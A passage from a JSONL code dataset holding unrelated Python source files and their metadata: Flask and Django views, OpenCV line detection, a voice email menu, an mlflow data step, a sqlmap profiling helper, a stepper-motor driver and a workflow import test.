os\nhandler_path=os.path.dirname(os.path.abspath(__file__))+\"\\\\..\\\\Handler\"\n\nimport sys\nsys.path.append(handler_path)\nfrom EnvironmentHandler import *\n\n#from script.Controler.CommonControler import *\n#from CommonHandler import *\nfrom flask import render_template, url_for, redirect,request\nfrom flaskapp import flask_app\nfrom script.Form.forms import QueryForm,TlaForm\nfrom script.Log.log import logging,log_stub,add_log_at_begin_and_end\n\n\n\n\n@flask_app.route(\"/environment_query\",methods=[\"GET\",\"POST\"])\ndef environment_query():\n tlas=GetTlaList()\n\n if request.method=='GET':\n result=request.args\n return render_template(\"./environment_query.html\",tlas=tlas,rows=[])\n \n else:\n result=request.form\n \n #return render_template(\"show_request.html\",result=result,method=request.method) \n \n \n \n if \"query\" in result.keys():\n if \"tla\" in result.keys() and \"deployment_type\" in result.keys():\n tla=result[\"tla\"].strip().upper()\n deployment_type=result[\"deployment_type\"].strip().upper()\n rows=query_environment_unique(tla,deployment_type)\n\n else:\n rows=[]\n return render_template(\"environment_query.html\", tlas=tlas, rows=rows)\n elif \"query_all\" in result.keys():\n if \"tla\" in result.keys():\n tla=result[\"tla\"].strip().upper().replace(\"*\",\"%\")\n if tla == \"\":\n tla = \"%\"\n rows=query_environment_by_tla(tla)\n return render_template(\"environment_query.html\",tlas=tlas,rows=rows)\n\n\n elif \"addnew\" in result.keys():\n row = create_environment_instance()\n return render_template(\"environment_query.html\", row=row,opt=\"AddNew\")\n #return redirect(\"tla_update.html\", form=tla_form, row=row,opt=\"AddNew\")\n\n elif \"modify\" in result.keys() or \"remove\" in result.keys():\n row = create_environment_instance()\n #return render_template(\"show_request.html\",result=result,method=request.method)\n row.id = result[\"id\"]\n row.tla = result[\"tla\"]\n row.deployment_type = result[\"deployment_type\"]\n row.server_type = result[\"server_type\"]\n row.server_machine = result[\"server_machine\"]\n row.terminal_machine = result[\"terminal_machine\"]\n row.comment = result[\"comment\"]\n row.monitored_by = result[\"monitored_by\"]\n row.enabled = result[\"enabled\"]\n row.key_words = result[\"key_words\"]\n row.is_compliance = result[\"is_compliance\"]\n\n if \"modify\" in result.keys():\n opt=\"Modify\"\n\n if \"remove\" in result.keys():\n opt=\"Remove\"\n\n return render_template(\"environment_update.html\", row=row,opt=opt)\n\n else:\n return render_template(\"show_request.html\", result=result, method=request.method)\n\n\n@flask_app.route(\"/environment_update\",methods=[\"GET\",\"POST\"])\ndef environment_update():\n tlas = GetTlaList()\n if request.method=='GET':\n result=request.args \n else:\n result=request.form\n\n\n if \"modify_update\" in result.keys() or \"addnew_update\" in result.keys():\n\n #return render_template(\"show_request.html\",result=result,method=request.method)\n if \"modify_update\" in result.keys():\n environment_id = result[\"id\"].strip()\n row = query_environment_by_id(environment_id)\n\n if \"addnew_update\" in result.keys():\n row = create_tla_instance()\n\n row.tla = result[\"tla\"]\n row.deployment_type = result[\"deployment_type\"]\n row.server_type = result[\"server_type\"]\n row.server_machine = result[\"server_machine\"]\n row.terminal_machine = result[\"terminal_machine\"]\n row.comment = result[\"comment\"]\n row.monitored_by = result[\"monitored_by\"]\n row.enabled = result[\"enabled\"]\n row.key_words = result[\"key_words\"]\n row.is_compliance = result[\"is_compliance\"]\n\n if \"modify_update\" in result.keys():\n update_environment(row)\n if \"addnew_update\" in result.keys():\n add_environment(row)\n\n return render_template(\"environment_query.html\",tlas=tlas,rows=[row])\n\n elif \"remove_update\" in result.keys():\n environment_id = result[\"id\"].strip()\n remove_environment_by_id(environment_id)\n return render_template(\"environment_query.html\", tlas=tlas,rows=[])\n\n elif \"cancel\" in result.keys():\n return render_template(\"environment_query.html\", tlas=tlas,rows=[])\n\n else:\n return render_template(\"show_request.html\", result=result, method=request.method)\n \n \n","sub_path":"script/Controler/EnvironmentControler.py","file_name":"EnvironmentControler.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384613173","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Post, Category\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseRedirect\nimport re\nfrom haystack.forms import SearchForm\nfrom taggit.models import Tag\n\ndef index(request):\n\n title = \"Nick Congleton | Blog\"\n metadesc = \"Nick Congleton's blog providing news, information, and guides on topic ranging from freelance writing to technology, programming, and gaming.\"\n page = request.GET.get('page')\n cat = request.GET.get('cat')\n search_form = SearchForm(request.POST or None)\n if cat:\n post_list= Paginator((Post.objects.filter(categories__name__in=[cat]).order_by('-date')), 10)\n else:\n post_list = Paginator((Post.objects.all().order_by('-date')), 10)\n categories = Category.objects.all() \n\n recent = Post.objects.all().order_by('-date')[:5]\n\n try:\n posts = post_list.page(page)\n except PageNotAnInteger:\n posts = post_list.page(1)\n except EmptyPage:\n posts = post_list.page(list.num_pages)\n \n context = {'title': title, 'metadesc': metadesc, 'posts': posts, 'categories': categories,'search_form': search_form, 'recent': recent,}\n template = 'blog/index.html'\n return render(request, template, context)\n\ndef show(request, post_id, slug):\n post = get_object_or_404(Post, pk=post_id)\n\n title = post.title\n metadesc = re.sub(\"<.*?>\", \"\", post.summary).strip()\n\n categories = Category.objects.all() \n tags = Tag.objects.all()\n\n recent = Post.objects.all().order_by('-date')[:5]\n search_form = SearchForm(request.POST or None)\n\n context = {'post': post, 'title': title, 'metadesc': metadesc, 'search_form': search_form, 'categories': categories, 'recent': recent,}\n template = 'blog/post.html'\n return render(request, template, context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584816298","text":"import cv2 as cv\nimport numpy as np\nimport math\nimport time\nimport os\n\npath= '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/1. Training'\nsource_path = '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/hough_transform_test'\nfor i in range(1,11):\n image_path = path + '/Translate_image%d.bmp'%i\n origin_img = cv.imread(image_path)\n cv.normalize(origin_img, origin_img, 0, 255, cv.NORM_MINMAX)\n gray = cv.cvtColor(origin_img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 70,90)\n lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=70, maxLineGap=10)\n #lines = cv.HoughLines(edges, 1, np.pi/180, 500)\n\n # First method\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(origin_img, (x1,y1),(x2,y2),(0,255,0),2)\n\n ''' \n # Second method\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv.line(origin_img,(x1,y1),(x2,y2),(0,0,255),2)\n '''\n save_image_path = source_path + '/hough_transform_test_%d'%i\n cv.imwrite('transform_%d.jpg'%i, origin_img)\n cv.imwrite('canny_%d.jpg'%i, edges)\n cv.destroyAllWindows()\n #cv.imshow(\"canny\", edges)\n #cv.imshow(\"result\", origin_img)\n #k = cv.waitKey()\n #if k == 27:\n # cv.destroyAllWindows()\n #elif k == ord('s'):\n # cv.imwrite('transform_%d'%i, origin_img)\n # cv.imwrite('canny_%d'%i, edges)\n # cv.destroyAllWindows()\n #cv.imwrite('hough_transform_test_%d.jpg'%i, origin_img)\n\n\nimage_path2 = '/home/cheeze/PycharmProjects/KJW/research/defect_inspection/techwing/sample_canny.jpg'\ntest_img = cv.imread(image_path2)\ncv.normalize(test_img, test_img, 0, 255, cv.NORM_MINMAX)\ngray = cv.cvtColor(test_img, cv.COLOR_BGR2GRAY)\nedges = cv.Canny(gray, 70,90)\n#lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength=5, maxLineGap=10)\nlines = cv.HoughLines(edges, 1, np.pi/180, 190)\ntest_img = test_img - 200\n'''\nfor line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(test_img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n'''\n\nfor line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv.line(test_img,(x1,y1),(x2,y2),(0,0,255),2)\n\n\ncv.imshow(\"sobel\", test_img)\ncv.waitKey()\ncv.destroyAllWindows()","sub_path":"2. research/2. Defect_inspection/device_edge_detection.py","file_name":"device_edge_detection.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360744712","text":"import speech_recognition as sr\r\nimport smtplib\r\n# import pyaudio\r\n# import platform\r\n# import sys\r\nfrom bs4 import BeautifulSoup\r\nimport email\r\nimport imaplib\r\nfrom gtts import gTTS\r\nimport pyglet\r\nimport os\r\nfrom imap_tools import MailBox, Q\r\nfrom playsound import playsound\r\nimport sendMail as sMail\r\nimport readMail as rMail\r\nimport random\r\n\r\ndef process(uname):\r\n\t#choices\r\n\tprint (\"1. composed a mail.\")\r\n\ttts = gTTS(text=\"option 1. composed a mail.\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello\"+str(ran)+\".mp3\") \r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\tprint (\"2. Check your inbox\")\r\n\ttts = gTTS(text=\"option 2. Check your inbox\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello1\"+str(ran)+\".mp3\")\r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\tprint (\"3. Exit\")\r\n\ttts = gTTS(text=\"option 3. Exit\", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello1\"+str(ran)+\".mp3\")\r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\r\n\r\n\t#this is for input choices\r\n\ttts = gTTS(text=\"Your choice \", lang='en')\r\n\tran=random.randint(0,999)\r\n\r\n\tttsname=(\"hello2\"+str(ran)+\".mp3\") \r\n\ttts.save(ttsname)\r\n\r\n\tplaysound(ttsname)\r\n\tos.remove(ttsname)\r\n\t\r\n\ttext=\"\"\r\n\twhile(text==\"\"):\r\n\t\t#voice recognition part\r\n\t\tr = sr.Recognizer()\r\n\t\tm = sr.Microphone()\r\n\t\t\t#set threhold level\r\n\t\twith m as source: r.adjust_for_ambient_noise(source)#recognize\r\n\t\twith sr.Microphone() as source:\r\n\t\t\tprint (\"Your choice:\")\r\n\t\t\taudio=r.listen(source)\r\n\t\t\tprint (\"ok done!!\")\r\n\r\n\t\ttry:\r\n\t\t\ttext=r.recognize_google(audio)\r\n\t\t\tprint (\"You said : \"+text)\r\n\t\r\n\t\texcept sr.UnknownValueError:\r\n\t\t\tprint(\"Google Speech Recognition could not understand audio.\")\r\n\t\t \r\n\t\texcept sr.RequestError as e:\r\n\t\t\tprint(\"Could not request results from Google Speech Recognition service; {0}\".format(e)) \r\n\r\n\t\tif text==\"\":\r\n\t\t\ttts = gTTS(text=\"Error in Message.Please Give Input Again \", lang='en')\r\n\t\t\tran=random.randint(0,999)\r\n\t\t\tttsname=(\"err\"+str(ran)+\".mp3\") \r\n\t\t\ttts.save(ttsname)\r\n\t\t\tplaysound(ttsname)\r\n\t\t\tos.remove(ttsname)\r\n\r\n\r\n\t#choices details\r\n\tif text == '1' or text == 'One' or text == 'one':\r\n\t\tprint(\"Choice one\")\r\n\t\tsMail.process(uname)\t\r\n\tif text == '2' or text == 'tu' or text == 'two' or text == 'Tu' or text == 'to' or text == 'To' or text == 'do' or text == 'Do' :\r\n\t\tprint(\"Choice two\")\r\n\t\trMail.process(uname)\r\n\tif text == '3' or text == 'th' or text == 'thr' or text == 'Th' or text == 'thre' or text == 'Three' :\r\n\t\tprint(\"Choice three\")\r\n\t\texit()\t","sub_path":"Start.py","file_name":"Start.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96609679","text":"# # def cetakBiodata(nama,umur,kota):\n# # print(f\"umur : {umur}\")\n# # print(f\"nama : {nama}\")\n# # print(f\"kota : {kota}\")\n\n# # cetakBiodata('Budi','13','Jakarta')\n\n# # Dictionary\n# def cetak(nama,twitter,**data_tambahan):\n# print(f\"nama : {nama}\")\n# print(f\"twitter : {twitter}\")\n# # print(data_tambahan['email'])\n# for x in data_tambahan:\n\n# print(f\"{x} : {data_tambahan[x]}\")\n\n# cetak(\"Silvy\",\"@silvy\",email=\"silvy@mail.com\",facebook=\"silvia.facebook\",telp=\"1234\")\n\n#\n# def sebuah_fungsi(sebuah_list):\n# sebuah_list = ['1','2','4']\n# print (sebuah_list)\n\n# ini_list = ['aaa','bbb']\n\n# sebuah_fungsi(ini_list)\n\ndef sebuahFungsiLain(sebuahList):\n sebuahList.append([10,20,30])\n print(sebuahList)\n\nsebuahList = [100,200,300]\n\nsebuahFungsiLain(sebuahList)\n\n\n\n","sub_path":"II/9_argument.py","file_name":"9_argument.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89314048","text":"#input Program\n\ncodeP1, numberP1, priceP1 = input().split() #tipedata masih string\ncodeP1, numberP1, priceP1 = int(codeP1), int(numberP1), float(priceP1)\n\ncodeP2, numberP2, priceP2 = input().split() #tipedata masih string\ncodeP2, numberP2, priceP2 = int(codeP2), int(numberP2), float(priceP2)\n\n#proses Program\n\nresult = (numberP1*priceP1)+(numberP2*priceP2)\n\n#output Program\n\nprint(\"VALOR A PAGAR: R$ %.2f\" % (result))","sub_path":"School/000-URIONLINE/1010.py","file_name":"1010.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32666837","text":"import logging\nimport os.path\n\nfrom datetime import datetime\nfrom lib.ArgumentParser import createparser\nfrom lib.Monitor import Monitor\n\n\ndef setup_logging(args):\n '''\n this function sets up the logging for the entire application\n '''\n logs_path = os.path.abspath('./logs')\n if not os.path.exists(logs_path):\n os.mkdir(logs_path)\n\n logger = logging.getLogger('catmonitor')\n logger.setLevel(logging.DEBUG)\n log_file = os.path.join(logs_path, datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\") + \".log\")\n\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler()\n\n if args.verbose:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter('[%(asctime)s][%(levelname)s][%(filename)s]\\t%(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger\n\n\nif __name__ == \"__main__\":\n args = createparser()\n setup_logging(args)\n\n monitor = Monitor(args)\n exit(monitor.start())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593766314","text":"import mlflow\nimport click\nimport logging\nimport pandas as pd\nimport numpy as np\nimport sklearn\n\nfrom sklearn.model_selection import train_test_split\n\nrandom_state = 42\nnp.random.seed(random_state)\n\n@click.command(help=\"Gather an input data set\")\n@click.option(\"--raw_dataset\", help=\"raw file data set\",\n default='./leaf.csv', type=str)\n@click.option(\"--noise\", help=\"Noise in testing\",\n default=0.003, type=float)\ndef gathering(raw_dataset, noise):\n with mlflow.start_run(run_name='gathering') as mlrun:\n\n # Your gathering code\n# file = '/home/guess/Desktop/autodeploy/examples/demo3/data-science/workflow/leaf.csv'\n names = ['species', 'specimen_number', 'eccentricity', 'aspect_ratio',\n 'elongation', 'solidity', 'stochastic_convexity', 'isoperimetric_factor',\n 'maximal_indentation_depth', 'lobedness', 'average_intensity',\n 'average_contrast', 'smoothness', 'third_moment', 'uniformity', 'entropy']\n\n df = pd.read_csv(raw_dataset, names=names)\n\n df_cleaned = df.loc[:, df.columns != 'specimen_number'].copy()\n df_cleaned[df_cleaned.columns] = df_cleaned[df_cleaned.columns].astype(float)\n df_cleaned['species'] = df_cleaned['species'].astype(int)\n\n test_size = 0.20\n\n training, testing = train_test_split(\n df_cleaned, test_size=test_size, random_state=random_state)\n\n print('Testing', testing.shape)\n testing_noise = testing.copy()\n \n testing_part = testing.loc[:, testing.columns != 'species'].sample(frac=0.5)\n noise = np.random.normal(0, noise, [len(testing_part),len(testing_part.columns)])\n df_noise = testing_part + noise\n\n testing_noise.loc[:, testing_noise.columns != 'species'] = df_noise\n\n testing_noise = testing_noise.dropna()\n\n new_testing = pd.concat([testing, testing_noise])\n print('New testing', new_testing.shape)\n\n training_noise = pd.concat([training, testing_noise.sample(10)])\n print('new_training', training_noise.shape) \n \n mlflow.log_param(key='n_rows_raw', value=len(df))\n print(df.head())\n\n training.to_csv('training.csv', index=False)\n training_noise.to_csv('training_noise.csv', index=False)\n new_testing.to_csv('testing.csv', index=False)\n testing_noise.to_csv('testing_noise.csv', index=False)\n \n mlflow.log_artifact('training.csv')\n mlflow.log_artifact('training_noise.csv')\n mlflow.log_artifact('testing.csv')\n mlflow.log_artifact('testing_noise.csv')\n \n\nif __name__ == '__main__':\n gathering()\n","sub_path":"examples/demo3/data-science/workflow/.ipynb_checkpoints/gathering-checkpoint.py","file_name":"gathering-checkpoint.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380694930","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Dani/Documents/Projects/Golismero_2.0/src_github/tools/sqlmap/lib/core/profiling.py\n# Compiled at: 2013-12-09 06:41:17\n\"\"\"\nCopyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)\nSee the file 'doc/COPYING' for copying permission\n\"\"\"\nimport codecs, os, cProfile\nfrom lib.core.common import getUnicode\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.settings import UNICODE_ENCODING\n\ndef profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n \"\"\"\n This will run the program and present profiling data in a nice looking graph\n \"\"\"\n try:\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gobject, gtk, pydot\n except ImportError as e:\n errMsg = 'profiling requires third-party libraries (%s). ' % getUnicode(e, UNICODE_ENCODING)\n errMsg += 'Quick steps:%s' % os.linesep\n errMsg += '1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz'\n logger.error(errMsg)\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.raw')\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.dot')\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, 'sqlmap_profile.png')\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n infoMsg = 'profiling the execution into file %s' % profileOutputFile\n logger.info(infoMsg)\n cProfile.run('start()', profileOutputFile)\n infoMsg = \"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n pydotGraph.write_png(imageOutputFile)\n infoMsg = 'displaying interactive graph with xdot library'\n logger.info(infoMsg)\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter('dot')\n win.open_file(dotOutputFile)\n gobject.timeout_add(1000, win.update, dotOutputFile)\n gtk.main()\n return","sub_path":"pycfiles/golismero-2.0.3-1.tar/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532682762","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articulos', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Compra',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', models.DateField(auto_now_add=True)),\n ('hora', models.TimeField(auto_now_add=True)),\n ('numero_factura', models.IntegerField()),\n ('scaneo', models.ImageField(blank=True, null=True, upload_to='imagen_comprobantes')),\n ],\n options={\n 'verbose_name': 'Compra',\n 'verbose_name_plural': 'Compras',\n },\n ),\n migrations.CreateModel(\n name='DetalleCompra',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cantidad', models.IntegerField(default=1)),\n ('articulo', models.ForeignKey(to='articulos.Articulo')),\n ('compra', models.ForeignKey(to='compras.Compra')),\n ],\n options={\n 'verbose_name': 'Detalle de Compra',\n 'verbose_name_plural': 'Detalles de Compras',\n },\n ),\n ]\n","sub_path":"apps/compras/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526497273","text":"\nimport os.path\n\nImport(\"env\")\n\n\n# SOURCES\n\nvectorsources = [\n\n\t]\n\nvectorheaders = [\n\n\t'types.h', 'vector.h'\n\n\t]\n\n\n# ADD INTERNAL FLAGS\n\nlibenv = env.Clone()\nlibenv.Append( CPPDEFINES=['VECTOR_COMPILE=1'] )\n\n\n# OUTPUTS\n\nenv['vectorlib'] = libenv.StaticLibrary( 'vector', vectorsources )\n\n\n# DEPENDENCIES\n\n#if env['toolset'] == 'gnu':\n#\tlibenv.Depends( [ os.path.splitext( x )[0] + '.o' for x in vectorsources ], '#/vector/vector.h.gch' )\n\n\n# INSTALLS\n\nlibenv.AddPostAction( 'vector', libenv.Install( '#lib/${platform}${platformsuffix}/${buildprofile}', [ env['vectorlib'] ] ) )\n","sub_path":"vector/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396379410","text":"\nfrom TMCL import *\n\nclass StepRocker(object):\n def __init__(self, N0, N1=None, N2=None, port=\"COM3\", debug=False):\n self._N0 = int(N0)\n self._N1 = None if (N1 is None) else int(N1)\n self._N2 = None if (N2 is None) else int(N2)\n self.TMCL = TMCL.TMCLDevice(port, debug)\n\n @property\n def N0(self):\n return self._N0\n\n @property\n def N1(self):\n if self._N1 is None:\n raise RuntimeError('Please set number of steps for this Motor')\n return self._N1\n\n @property\n def N2(self):\n if self._N2 is None:\n raise RuntimeError('Please set number of steps for this Motor')\n return self._N2\n\n def set_motor_steps(self, N0=None, N1=None, N2=None):\n if not (N0 is None):\n self._N0 = int(N0)\n if not (N1 is None):\n self._N1 = int(N1)\n if not (N2 is None):\n self._N2 = int(N2)\n\n def get_globals(self):\n ret = {}\n for key, value in TMCL.GLOBAL_PARAMETER.iteritems():\n #print \"GGP:\",key+value\n bank, par, name, _, _ = key+value\n ret[name] = self.TMCL.ggp(bank, par)\n return ret\n\n def get_parameters(self):\n retmotor = [{}, {}, {}]\n retsingle = {}\n for mn in range(3):\n for key, value in TMCL.AXIS_PARAMETER.iteritems():\n par, name, _, _ = (key,)+value\n #print \"GAP:\", mn, (key,)+value\n if par not in TMCL.SINGLE_AXIS_PARAMETERS:\n retmotor[mn][name] = self.TMCL.gap(mn, par)\n elif mn == 0:\n retsingle[name] = self.TMCL.gap(mn, par)\n return retmotor, retsingle\n\n def set_important_parameters(self, maxspeed=1000, maxaccel=1000,\n maxcurrent=470, standbycurrent=117,\n microstep_resolution=6,store=False):\n self.TMCL.sap(0, 140, int(microstep_resolution))\n for mn in range(3):\n self.TMCL.sap(mn, 4, int(maxspeed))\n self.TMCL.sap(mn, 5, int(maxaccel))\n self.TMCL.sap(mn, 6, int(maxcurrent))\n self.TMCL.sap(mn, 7, int(standbycurrent))\n if not bool(store):\n return\n self.TMCL.stap(0, 140)\n for mn in range(3):\n self.TMCL.stap(mn, 4)\n self.TMCL.stap(mn, 5)\n self.TMCL.stap(mn, 6)\n self.TMCL.stap(mn, 7)\n\n def rotate(self, frequency, motor=0, direction='cw'):\n microstep_resolution = self.TMCL.gap(0, 140)\n vel = int(frequency * self.N0 * microstep_resolution)\n mn = int(motor)\n if str(direction) == 'cw':\n self.TMCL.ror(mn, vel)\n elif str(direction) == 'ccw':\n self.TMCL.rol(mn, vel)\n else:\n raise ValueError('direction needs to be either \"cw\" or \"ccw\"')\n return vel / float( self.N0 * microstep_resolution )\n\n\n def stop(self, motor=0):\n mn = int(motor)\n self.TMCL.mst(mn)\n\n\nif __name__ == \"__main__\":\n\n import time\n\n #rocker = StepRocker(200, port='COM3')\n stepper = TMCLDevice(\"COM3\")\n stepper.sap(0,4,500) #set the speed\n stepper.mvp(0,\"REL\",-12800) #turn 1 revolution ccw\n #time.sleep(1)\n #rocker.stop()\n","sub_path":"TMCM.py","file_name":"TMCM.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251820884","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Tests for workflow specific imports.\"\"\"\n\nfrom datetime import date\nimport collections\n\nimport ddt\nimport freezegun\n\nfrom integration.ggrc import TestCase\nfrom integration.ggrc_workflows import generator as wf_generator\nfrom integration.ggrc_workflows.models import factories as wf_factories\nfrom integration.ggrc.models import factories\n\nfrom ggrc import db\nfrom ggrc.converters import errors\nfrom ggrc.models.objective import Objective\nfrom ggrc_workflows.models.task_group import TaskGroup\nfrom ggrc_workflows.models.task_group_task import TaskGroupTask\nfrom ggrc_workflows.models.workflow import Workflow\n\n\n@ddt.ddt\nclass TestWorkflowObjectsImport(TestCase):\n \"\"\"Test imports for basic workflow objects.\"\"\"\n\n def setUp(self):\n super(TestWorkflowObjectsImport, self).setUp()\n self.generator = wf_generator.WorkflowsGenerator()\n\n def test_full_good_import(self):\n \"\"\"Test full good import without any warnings.\"\"\"\n user_data = [\n collections.OrderedDict([\n (\"object_type\", \"Person\"),\n (\"name\", \"TestUser\"),\n (\"email\", \"testuser@example.com\"),\n ]),\n ]\n response = self.import_data(*user_data)\n\n objective_data = [\n collections.OrderedDict([\n (\"object_type\", \"objective\"),\n (\"Code*\", \"\"),\n (\"title\", \"obj-1\"),\n (\"admin\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"objective\"),\n (\"Code*\", \"\"),\n (\"title\", \"obj-2\"),\n (\"admin\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*objective_data)\n\n workflow_data = [\n collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", \"wf-1\"),\n (\"Need Verification\", True),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*workflow_data)\n\n workflow = Workflow.query.filter_by(title=\"wf-1\").first()\n objective = Objective.query.filter_by(title=\"obj-1\").first()\n task_group_data = [\n collections.OrderedDict([\n (\"object_type\", \"TaskGroup\"),\n (\"code\", \"\"),\n (\"title\", \"tg-1\"),\n (\"workflow\", workflow.slug),\n (\"Assignee\", \"testuser@example.com\"),\n (\"map:objective\", objective.slug)\n ]),\n ]\n response += self.import_data(*task_group_data)\n\n task_group = TaskGroup.query.filter_by(title=\"tg-1\").first()\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-2\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 10)),\n (\"task due date\", date(2016, 12, 30)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-3\"),\n (\"task type\", \"Checkboxes\"),\n (\"task description\", \"ch1, ch2 , some checkbox 3\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2016, 7, 8)),\n (\"task due date\", date(2017, 12, 